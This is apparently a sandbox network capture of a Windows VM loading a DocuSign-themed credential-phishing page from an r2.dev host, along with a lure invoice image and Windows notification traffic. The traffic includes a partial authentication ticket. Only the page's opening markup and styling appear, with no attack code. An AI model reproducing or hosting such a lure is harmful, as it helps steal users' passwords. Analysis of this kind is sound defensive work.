2025-01-14 00:38:56 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 00:38:56 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6b 6a 2b 74 33 63 53 45 30 45 6d 6e 34 71 43 78 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 61 61 31 31 32 37 38 31 30 62 31 62 63 34 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 6c 77 42 64 4a 32 77 51 54 34 76 46 62 39 52 54 43 75 45 4f 71 4b 48 4e 54 76 6a 4e 32 73 43 72 30 4d 5a 48 4e 44 42 64 63 67 52 6a 76 74 58 44 46 34 61 6e 76 4b 48 59 72 68 7a 45 2b 49 4d 52 36 68 66 30 48 6d 34 6e 38 38 5a 71 33 64 37 31 4a 71 4a 67 4b 66 65 72 70 49 51 31 70 69 44 44 39 6d 74 2b 7a 68 71 4f 5a 6f 52 54 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: kj+t3cSE0Emn4qCx.2Context: 8aa1127810b1bc4f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXlwBdJ2wQT4vFb9RTCuEOqKHNTvjN2sCr0MZHNDBdcgRjvtXDF4anvKHYrhzE+IMR6hf0Hm4n88Zq3d71JqJgKferpIQ1piDD9mt+zhqOZoRT
2025-01-14 00:38:56 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6b 6a 2b 74 33 63 53 45 30 45 6d 6e 34 71 43 78 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 61 61 31 31 32 37 38 31 30 62 31 62 63 34 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: kj+t3cSE0Emn4qCx.3Context: 8aa1127810b1bc4f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 00:38:56 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 00:38:56 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 4e 33 39 31 74 58 46 36 56 55 75 70 41 69 39 75 71 67 74 59 50 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: N391tXF6VUupAi9uqgtYPg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49724	162.159.140.237	443	1060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:39:00 UTC	708	OUT	GET /docu/e_protocol.html?e HTTP/1.1 Host: pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 00:39:00 UTC	284	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 00:39:00 GMT Content-Type: text/html Content-Length: 252205 Connection: close Accept-Ranges: bytes ETag: "ac9dbd4fd1fb0add29a1b8703bce9406" Last-Modified: Thu, 09 Jan 2025 07:01:58 GMT Server: cloudflare CF-RAY: 90199102c8541a48-EWR
2025-01-14 00:39:00 UTC	1085	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 20 63 6c 61 73 73 3d 61 63 63 6f 75 6e 74 2d 73 65 72 76 65 72 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e 44 6f 63 75 53 69 67 6e 20 4c 6f 67 69 6e 20 2d 20 45 6e 74 65 72 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 20 74 6f 20 73 69 67 6e 20 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 73 74 79 6c 65 20 64 61 74 61 2d 65 6d 6f 74 69 6f 6e 3d 63 73 73 20 64 61 74 61 2d 73 69 6e 67 6c 65 2d 66 69 6c 65 7a 2d 73 74 79 6c 65 73 68 65 65 74 3d 31 36 3e 2e 61 63 63 6f 75 6e 74 2d 73 65 72 76 Data Ascii: <!DOCTYPE html> <html lang=en class=account-server><meta charset=utf-8><meta name=viewport content="initial-scale=1.0"><title>DocuSign Login - Enter your password to sign in</title><style data-emotion=css data-single-filez-stylesheet=16>.account-serv
2025-01-14 00:39:00 UTC	1369	IN	Data Raw: 69 6e 6b 2d 62 6f 64 79 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 30 30 70 78 29 7b 2e 69 6e 6b 2d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 7d 2e 69 6e 6b 2d 70 61 67 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 69 6e 6b 2d 66 6f 72 6d 2d 75 6e 69 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 35 72 65 6d 7d 2e 69 6e 6b 2d 66 6f 72 6d 2d 75 6e 69 74 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 72 65 6d 7d 2e 69 6e 6b 2d 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e Data Ascii: ink-body{justify-content:center}}@media (min-width:600px){.ink-body{display:flex;flex-direction:column;align-items:center}}.ink-page-title{margin-bottom:1rem}.ink-form-unit{margin-top:1.5rem}.ink-form-unit:first-child{margin-top:2rem}.ink-secondary-button
2025-01-14 00:39:00 UTC	1369	IN	Data Raw: 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 7d 2a 2c 3a 3a 61 66 74 65 72 2c 3a 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 44 53 49 6e 64 69 67 6f 22 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 73 72 63 3a 75 72 6c 28 64 61 74 61 3a 66 6f 6e 74 2f 77 6f 66 66 32 3b 62 61 73 65 36 34 2c 64 30 39 47 4d 67 41 42 41 41 41 41 41 48 4e 4d 41 42 49 41 41 41 41 42 59 73 77 41 41 48 4c 6b 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: t-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}*,::after,::before{box-sizing:inherit}@font-face{font-family:"DSIndigo";font-style:normal;font-weight:400;src:url(data:font/woff2;base64,d09GMgABAAAAAHNMABIAAAABYswAAHLkAAEAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-14 00:39:00 UTC	1369	IN	Data Raw: 39 37 64 2f 4f 2f 52 6b 6a 39 6e 79 59 4f 36 43 48 78 45 54 38 30 77 58 48 74 48 74 63 78 64 31 6e 72 41 54 65 72 6c 46 4a 4b 4b 54 71 6e 6a 32 48 5a 76 67 75 4b 46 44 7a 56 42 53 72 61 33 55 65 6b 54 61 4a 74 2b 76 64 72 67 62 59 57 78 52 51 4b 48 53 4a 57 61 48 48 36 74 58 68 7a 61 77 2f 31 6a 6b 31 38 2f 61 50 6e 62 36 43 55 5a 42 53 30 30 66 79 75 64 35 54 66 6e 75 2f 35 6e 6f 39 47 6f 79 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 67 36 4f 6a 72 61 72 77 48 34 39 65 32 37 77 62 6c 48 55 78 52 46 30 52 52 4e 36 2f 44 41 4c 64 6f 6c 47 6b 56 52 4e 49 6f 75 43 37 53 7a 2f 4d 4a 5a 71 41 55 45 4b 48 4d 79 7a 75 79 45 64 6c 63 2b 61 5a 75 41 41 67 41 2f 31 64 53 76 61 35 58 6b 2f 6d 6b 46 5a 71 78 6b 50 69 52 2f 41 50 6a 73 41 Data Ascii: 97d/O/Rkj9nyYO6CHxET80wXHtHtcxd1nrATerlFJKKTqnj2HZvguKFDzVBSra3UekTaJt+vdrgbYWxRQKHSJWaHH6tXhzaw/1jk18/aPnb6CUZBS00fyud5Tfnu/5no9GoyiKoiiKoiiKoiiKoiiKoiiKoig6OjrarwH49e27wblHUxRF0RRN6/DALdolGkVRNIouC7Sz/MJZqAUEKHMyzuyEdlc+aZuAAgA/1dSva5Xk/mkFZqxkPiR/APjsA
2025-01-14 00:39:00 UTC	1369	IN	Data Raw: 56 37 62 7a 51 6d 4e 31 7a 30 46 42 73 49 4f 5a 4b 32 45 45 62 53 6a 62 52 6c 45 38 4f 71 57 65 62 63 6f 57 77 6b 6f 43 6e 6e 54 6c 4f 4f 35 2b 68 50 47 6a 6b 64 33 69 34 71 79 49 56 73 53 69 76 6f 63 4d 41 37 6c 2b 41 66 6c 5a 35 37 70 68 6a 2f 39 76 69 37 7a 2b 79 63 75 78 7a 39 2f 32 37 49 64 6d 4f 33 74 4f 38 58 6f 37 58 6d 50 36 45 69 4d 6b 70 44 5a 32 55 5a 79 57 6b 6c 4a 43 52 77 73 39 4d 44 7a 33 68 65 7a 47 6a 78 6e 37 74 37 45 56 69 50 38 77 68 68 45 4e 78 68 78 32 50 4d 6c 57 58 79 44 7a 70 4c 46 34 7a 37 38 75 58 7a 49 70 61 57 47 74 6d 6f 2b 58 4b 6e 74 66 45 69 2f 4d 6c 63 79 5a 59 4c 72 2f 77 77 6d 4f 49 4e 2b 68 51 46 70 30 49 76 6b 54 2f 71 2b 4b 43 6f 6c 4c 7a 51 36 41 76 4d 63 50 77 31 43 43 55 70 49 77 68 6b 49 78 54 38 34 4c 6b 78 69 Data Ascii: V7bzQmN1z0FBsIOZK2EEbSjbRlE8OqWebcoWwkoCnnTlOO5+hPGjkd3i4qyIVsSivocMA7l+AflZ57phj/9vi7z+ycuxz9/27IdmO3tO8Xo7XmP6EiMkpDZ2UZyWklJCRws9MDz3hezGjxn7t7EViP8whhENxhx2PMlWXyDzpLF4z78uXzIpaWGtmo+XKntfEi/MlcyZYLr/wwmOIN+hQFp0IvkT/q+KColLzQ6AvMcPw1CCUpIwhkIxT84Lkxi
2025-01-14 00:39:00 UTC	1369	IN	Data Raw: 64 59 66 4f 4d 43 65 75 50 54 46 49 72 54 6f 6f 75 6d 68 36 44 42 67 79 4e 70 4f 4a 57 55 79 5a 64 30 73 30 75 2b 70 43 57 72 7a 68 52 31 52 54 55 46 4b 6c 53 5a 63 68 6b 30 53 57 6e 46 53 38 31 30 71 55 71 76 6c 32 4a 54 71 4a 62 58 54 5a 69 34 4d 4f 4f 65 4b 59 55 38 34 34 6c 77 76 6b 34 74 32 6c 58 4a 36 75 75 4f 71 61 36 32 37 6c 44 75 37 6c 41 56 35 34 35 63 32 64 4c 32 6a 66 64 46 33 63 77 43 34 65 6f 6b 50 77 50 53 55 6d 61 54 47 6b 7a 34 6e 45 35 6f 36 4d 65 52 30 4d 41 5a 49 75 6f 61 45 58 66 63 2b 41 49 65 50 4d 68 49 6c 5a 6a 57 56 4d 49 32 61 54 65 62 56 41 73 34 78 56 73 6d 62 54 62 56 48 73 69 50 32 46 73 48 72 69 38 59 37 76 4b 37 2b 49 53 4c 4b 54 49 72 57 6d 59 61 54 4c 6b 45 6b 69 53 30 35 79 49 33 6b 71 58 34 46 43 78 53 6c 42 71 54 4c Data Ascii: dYfOMCeuPTFIrTooumh6DBgyNpOJWUyZd0s0u+pCWrzhR1RTUFKlSZchk0SWnFS810qUqvl2JTqJbXTZi4MOOeKYU844lwvk4t2lXJ6uuOqa627lDu7lAV545c2dL2jfdF3cwC4eokPwPSUmaTGkz4nE5o6MeR0MAZIuoaEXfc+AIePMhIlZjWVMI2aTebVAs4xVsmbTbVHsiP2FsHri8Y7vK7+ISLKTIrWmYaTLkEkiS05yI3kqX4FCxSlBqTL
2025-01-14 00:39:00 UTC	1369	IN	Data Raw: 37 4b 4a 48 53 75 77 42 4b 41 4c 5a 6d 58 42 2b 61 34 57 6c 63 36 55 78 6f 6b 67 4c 68 67 56 70 48 52 46 30 71 34 35 77 59 72 4f 68 69 43 47 71 6a 52 67 72 73 61 30 56 68 43 36 30 7a 51 6e 4c 6e 73 79 57 73 67 77 65 31 7a 58 31 4e 74 41 31 37 7a 34 67 6a 33 4d 59 30 33 38 56 6c 74 36 44 69 2f 50 4d 49 51 49 6c 67 4c 67 6b 34 73 54 65 44 74 51 46 57 32 79 64 67 67 65 4b 58 58 59 41 52 2b 55 41 63 32 57 65 63 37 76 56 70 6b 46 51 77 64 48 46 75 67 46 54 4a 51 6b 58 4e 55 45 70 61 62 5a 34 6b 2b 6e 36 74 36 2b 6c 41 35 54 6c 75 2f 4f 33 77 45 69 67 64 64 70 58 6c 65 31 67 66 59 55 37 41 4d 55 67 6b 6c 6b 42 6f 65 56 71 45 65 59 6b 6a 34 64 44 4f 61 67 68 75 62 31 7a 51 57 76 46 34 48 53 63 6e 33 78 52 74 64 55 6b 4e 4d 74 55 76 70 39 42 67 54 44 63 49 6c 73 Data Ascii: 7KJHSuwBKALZmXB+a4Wlc6UxokgLhgVpHRF0q45wYrOhiCGqjRgrsa0VhC60zQnLnsyWsgwe1zX1NtA17z4gj3MY038Vlt6Di/PMIQIlgLgk4sTeDtQFW2ydggeKXXYAR+UAc2Wec7vVpkFQwdHFugFTJQkXNUEpabZ4k+n6t6+lA5Tlu/O3wEigddpXle1gfYU7AMUgklkBoeVqEeYkj4dDOaghub1zQWvF4HScn3xRtdUkNMtUvp9BgTDcIls
2025-01-14 00:39:00 UTC	1369	IN	Data Raw: 64 37 43 30 46 65 59 65 6c 4b 7a 44 44 5a 54 42 30 36 2f 45 55 48 6f 42 31 50 6a 6c 7a 44 2f 61 70 79 73 74 53 57 67 6c 7a 6d 32 76 61 49 73 63 61 35 6c 48 31 33 71 42 39 67 42 62 68 6b 43 48 56 63 65 53 6a 59 30 31 52 2f 65 4d 36 74 6a 72 58 6b 36 54 70 6e 63 61 77 43 75 34 46 49 31 49 71 36 6e 64 47 75 59 74 32 71 33 34 74 46 55 74 61 77 4d 57 72 54 49 72 4c 4a 45 4d 6f 46 65 5a 41 36 73 76 2b 4e 79 70 35 59 54 79 6e 78 68 45 44 73 33 54 37 35 47 7a 6d 55 69 33 5a 6c 53 37 4b 79 51 35 68 54 30 55 2b 57 6c 48 6b 69 6d 43 2b 75 48 7a 62 41 4e 6b 67 30 52 44 55 73 61 6f 54 50 5a 42 6f 56 4e 51 2b 52 6e 35 57 48 31 69 71 72 65 59 31 32 48 56 75 48 59 4c 33 45 42 71 6d 4e 4d 70 73 45 6d 7a 56 73 6b 64 75 71 73 45 33 44 64 71 57 54 75 39 6f 70 7a 68 53 63 52 Data Ascii: d7C0FeYelKzDDZTB06/EUHoB1PjlzD/apystSWglzm2vaIsca5lH13qB9gBbhkCHVceSjY01R/eM6tjrXk6TpncawCu4FI1Iq6ndGuYt2q34tFUtawMWrTIrLJEMoFeZA6sv+Nyp5YTynxhEDs3T75GzmUi3ZlS7KyQ5hT0U+WlHkimC+uHzbANkg0RDUsaoTPZBoVNQ+Rn5WH1iqreY12HVuHYL3EBqmNMpsEmzVskduqsE3DdqWTu9opzhScR
2025-01-14 00:39:00 UTC	1369	IN	Data Raw: 48 35 31 48 2f 4f 6b 4c 31 73 46 33 47 68 69 57 37 6c 55 55 71 64 4e 42 66 53 61 53 43 7a 4f 6c 64 72 55 6c 2f 49 35 6c 36 75 36 59 30 43 61 4e 63 65 32 72 70 77 4e 54 77 57 64 35 39 4f 77 33 69 74 38 6d 34 55 67 4e 51 4e 4d 63 41 75 4b 71 54 4b 53 46 4b 55 78 53 70 76 44 59 43 4b 70 70 6a 41 42 71 74 35 4a 70 64 51 58 6f 6e 44 38 73 51 61 6b 6f 73 79 57 73 54 55 6d 32 54 41 50 52 67 5a 41 71 38 76 70 33 76 46 46 72 48 58 54 45 54 77 70 6b 56 4f 6a 56 6c 5a 66 4c 54 41 66 7a 39 68 61 4d 70 69 7a 57 32 2b 56 2f 67 54 64 5a 34 53 51 54 66 30 61 68 39 6f 4a 75 65 68 39 7a 56 76 56 47 5a 37 53 34 4f 44 30 79 2f 6f 30 54 76 71 30 56 63 47 4f 76 72 4c 72 32 55 6e 34 70 4b 4c 75 2f 59 58 38 32 66 54 55 70 4e 48 6b 38 69 42 45 6d 4a 36 42 67 52 30 2b 52 4c 53 4c Data Ascii: H51H/OkL1sF3GhiW7lUUqdNBfSaSCzOldrUl/I5l6u6Y0CaNce2rpwNTwWd59Ow3it8m4UgNQNMcAuKqTKSFKUxSpvDYCKppjABqt5JpdQXonD8sQakosyWsTUm2TAPRgZAq8vp3vFFrHXTETwpkVOjVlZfLTAfz9haMpizW2+V/gTdZ4SQTf0ah9oJueh9zVvVGZ7S4OD0y/o0Tvq0VcGOvrLr2Un4pKLu/YX82fTUpNHk8iBEmJ6BgR0+RLSL
2025-01-14 00:39:00 UTC	1369	IN	Data Raw: 50 64 6a 61 6e 78 68 64 63 72 48 67 6a 79 75 30 4c 47 31 6d 2f 4e 66 4e 31 4d 30 50 45 2b 34 66 44 78 4c 56 36 52 38 67 6c 77 4e 64 61 71 6c 47 59 35 74 34 5a 6b 38 76 33 63 76 6a 76 64 73 2f 36 31 65 42 51 7a 38 61 47 65 37 30 4e 56 39 4e 68 53 62 55 79 47 65 66 52 35 4b 50 75 67 58 76 75 59 62 65 69 74 37 5a 7a 57 52 6c 65 37 48 52 38 76 70 48 36 71 38 4c 64 36 79 6d 50 53 45 4c 33 33 48 69 2b 46 75 54 51 6d 47 68 6b 58 58 5a 75 74 5a 72 47 7a 74 37 36 41 37 59 61 42 51 47 6f 53 63 32 7a 71 55 31 6f 6b 4c 4b 77 61 50 74 45 53 32 61 59 31 66 30 46 74 68 6f 4a 4b 6d 2f 74 57 34 44 7a 77 64 70 7a 4c 53 43 38 6d 47 68 30 59 4a 77 58 65 52 38 69 39 67 39 53 38 6d 64 76 71 38 2f 41 58 31 6c 4c 71 69 76 4d 5a 6e 75 7a 45 38 6d 6d 4f 74 47 6e 62 6d 44 2f 32 5a Data Ascii: PdjanxhdcrHgjyu0LG1m/NfN1M0PE+4fDxLV6R8glwNdaqlGY5t4Zk8v3cvjvds/61eBQz8aGe70NV9NhSbUyGefR5KPugXvuYbeit7ZzWRle7HR8vpH6q8Ld6ymPSEL33Hi+FuTQmGhkXXZutZrGzt76A7YaBQGoSc2zqU1okLKwaPtES2aY1f0FthoJKm/tW4DzwdpzLSC8mGh0YJwXeR8i9g9S8mdvq8/AX1lLqivMZnuzE8mmOtGnbmD/2Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49736	95.154.228.177	443	1060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:39:01 UTC	635	OUT	GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1 Host: www.continentalsports.co.uk Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 00:39:02 UTC	370	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 (Ubuntu) Date: Tue, 14 Jan 2025 00:39:01 GMT Content-Type: image/jpeg Content-Length: 7494 Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT Connection: close ETag: "62e062bc-1d46" Expires: Wed, 14 Jan 2026 00:39:01 GMT Cache-Control: max-age=31536000 Cache-Control: public X-Frame-Options: SAMEORIGIN Accept-Ranges: bytes
2025-01-14 00:39:02 UTC	7494	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 38 30 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 38 30 0a ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c2 00 11 08 01 09 01 09 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 00 02 03 01 01 00 00 00 00 00 00 Data Ascii: JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49744	95.154.228.177	443	1060	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:39:02 UTC	435	OUT	GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1 Host: www.continentalsports.co.uk Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 00:39:03 UTC	370	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 (Ubuntu) Date: Tue, 14 Jan 2025 00:39:03 GMT Content-Type: image/jpeg Content-Length: 7494 Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT Connection: close ETag: "62e062bc-1d46" Expires: Wed, 14 Jan 2026 00:39:03 GMT Cache-Control: max-age=31536000 Cache-Control: public X-Frame-Options: SAMEORIGIN Accept-Ranges: bytes
2025-01-14 00:39:03 UTC	7494	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 38 30 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 38 30 0a ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c2 00 11 08 01 09 01 09 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 00 02 03 01 01 00 00 00 00 00 00 Data Ascii: JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.6	49863	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 00:39:21 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 67 51 77 54 33 48 74 65 33 30 32 66 57 54 59 6a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 61 65 36 63 30 32 66 66 64 31 39 38 33 30 33 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: gQwT3Hte302fWTYj.1Context: 7ae6c02ffd198303
